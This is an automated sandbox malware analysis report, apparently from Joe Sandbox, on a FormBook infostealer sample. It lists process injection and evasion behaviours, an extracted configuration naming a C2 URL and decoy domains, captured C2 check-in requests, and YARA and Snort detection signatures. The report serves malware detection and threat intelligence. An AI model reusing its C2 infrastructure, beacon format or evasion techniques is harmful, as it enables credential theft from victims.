Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report cryptedprof.exe

Overview

General Information

Sample Name:cryptedprof.exe
Analysis ID:356722
MD5:72efe20e4a59ae2722383b8786956994
SHA1:453b2af3b318668926087556eebfa93eda75d2df
SHA256:d8e0edf1cca3b6edefcd830e233131c593997b5bd4454891dc1b70614862f718
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • cryptedprof.exe (PID: 6980 cmdline: 'C:\Users\user\Desktop\cryptedprof.exe' MD5: 72EFE20E4A59AE2722383B8786956994)
    • cryptedprof.exe (PID: 7064 cmdline: 'C:\Users\user\Desktop\cryptedprof.exe' MD5: 72EFE20E4A59AE2722383B8786956994)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 984 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 6592 cmdline: /c del 'C:\Users\user\Desktop\cryptedprof.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.warungsuntik.com/rcv/"], "decoy": ["dorlandoconstruction.com", "houswifekelly.com", "thunderprnet.com", "licipo.com", "ecocotte.com", "xt.show", "sneakerbyhailss.com", "xn--xcke3b8f283o9jzd.com", "1915dobbindr.com", "njbroncosfootball.com", "xn--missrosmakeup-vhb.com", "poertz.com", "20gb-internett-hediye.com", "legalprotech.com", "smarttechnetworks.com", "jamusedwards.com", "smartsettleinfinity.com", "dizesh.com", "gnoccho.com", "historyzapper.com", "sdponcologypatientaid.com", "tabandolano.online", "iveysmotorlodgeme.com", "e-market88.com", "carpetlaunch.com", "creativeladder.net", "bjhysz.com", "befton.ovh", "kehadiransiswa.online", "trunglet.com", "warrenswelding.online", "sculptedspa.com", "avalon78m.online", "diverseworker.com", "sounongwang.com", "sanaugustinegardenresort.com", "active-trinity.com", "thatlocaljawn.com", "myadamandsteve.com", "yourbestpprazdnik.club", "pop2.online", "gavinlurssen.com", "everybodywantstobfamous.com", "shegimx.com", "qbluebaypanowdbuy.com", "peatedbrandy.online", "weightsandweed.com", "remotepowers.com", "yangguangdiannao.com", "ruecedu.com", "honeybadgerpodcast.com", "ivario.cloud", "indeep-events.com", "luzshoesr.online", "lanskyee.com", "chinalsgroup.com", "divanna-box.site", "reginajewerlyco.com", "voshtravels.com", "isahil.tech", "smartloanbuilder.net", "dojosinaptico.com", "finik.clinic", "columbus-luxury-hotels.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.cryptedprof.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.cryptedprof.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.cryptedprof.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.cryptedprof.exe.2a60000.5.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.cryptedprof.exe.2a60000.5.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.warungsuntik.com/rcv/"], "decoy": ["dorlandoconstruction.com", "houswifekelly.com", "thunderprnet.com", "licipo.com", "ecocotte.com", "xt.show", "sneakerbyhailss.com", "xn--xcke3b8f283o9jzd.com", "1915dobbindr.com", "njbroncosfootball.com", "xn--missrosmakeup-vhb.com", "poertz.com", "20gb-internett-hediye.com", "legalprotech.com", "smarttechnetworks.com", "jamusedwards.com", "smartsettleinfinity.com", "dizesh.com", "gnoccho.com", "historyzapper.com", "sdponcologypatientaid.com", "tabandolano.online", "iveysmotorlodgeme.com", "e-market88.com", "carpetlaunch.com", "creativeladder.net", "bjhysz.com", "befton.ovh", "kehadiransiswa.online", "trunglet.com", "warrenswelding.online", "sculptedspa.com", "avalon78m.online", "diverseworker.com", "sounongwang.com", "sanaugustinegardenresort.com", "active-trinity.com", "thatlocaljawn.com", "myadamandsteve.com", "yourbestpprazdnik.club", "pop2.online", "gavinlurssen.com", "everybodywantstobfamous.com", "shegimx.com", "qbluebaypanowdbuy.com", "peatedbrandy.online", "weightsandweed.com", "remotepowers.com", "yangguangdiannao.com", "ruecedu.com", "honeybadgerpodcast.com", "ivario.cloud", "indeep-events.com", "luzshoesr.online", "lanskyee.com", "chinalsgroup.com", "divanna-box.site", "reginajewerlyco.com", "voshtravels.com", "isahil.tech", "smartloanbuilder.net", "dojosinaptico.com", "finik.clinic", "columbus-luxury-hotels.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: cryptedprof.exeReversingLabs: Detection: 27%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: cryptedprof.exeJoe Sandbox ML: detected
          Source: 3.1.cryptedprof.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.cryptedprof.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.cryptedprof.exe.2a60000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: cryptedprof.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: cryptedprof.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: cryptedprof.exe, 00000001.00000003.334189202.0000000002C50000.00000004.00000001.sdmp, cryptedprof.exe, 00000003.00000002.388641562.0000000000BAF000.00000040.00000001.sdmp, msdt.exe, 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cryptedprof.exe, msdt.exe
          Source: Binary string: msdt.pdb source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004065C1 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004027A1 FindFirstFileA,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49746 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 111.221.46.49:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.warungsuntik.com/rcv/
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.thatlocaljawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.warungsuntik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.tabandolano.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: CLAYERLIMITED-AS-APClayerLimitedHK CLAYERLIMITED-AS-APClayerLimitedHK
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.thatlocaljawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.warungsuntik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1Host: www.tabandolano.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.thatlocaljawn.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Feb 2021 14:32:22 GMTContent-Type: text/htmlContent-Length: 479Connection: closeETag: "601d0d01-1df"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: cryptedprof.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: cryptedprof.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.338525692.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: msdt.exe, 00000007.00000002.594068714.000000000508F000.00000004.00000001.sdmpString found in binary or memory: http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNv
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.352954703.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
